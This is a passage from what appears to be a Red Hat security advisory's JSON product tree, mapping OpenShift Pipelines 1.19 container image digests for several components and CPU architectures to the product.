"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le"
},
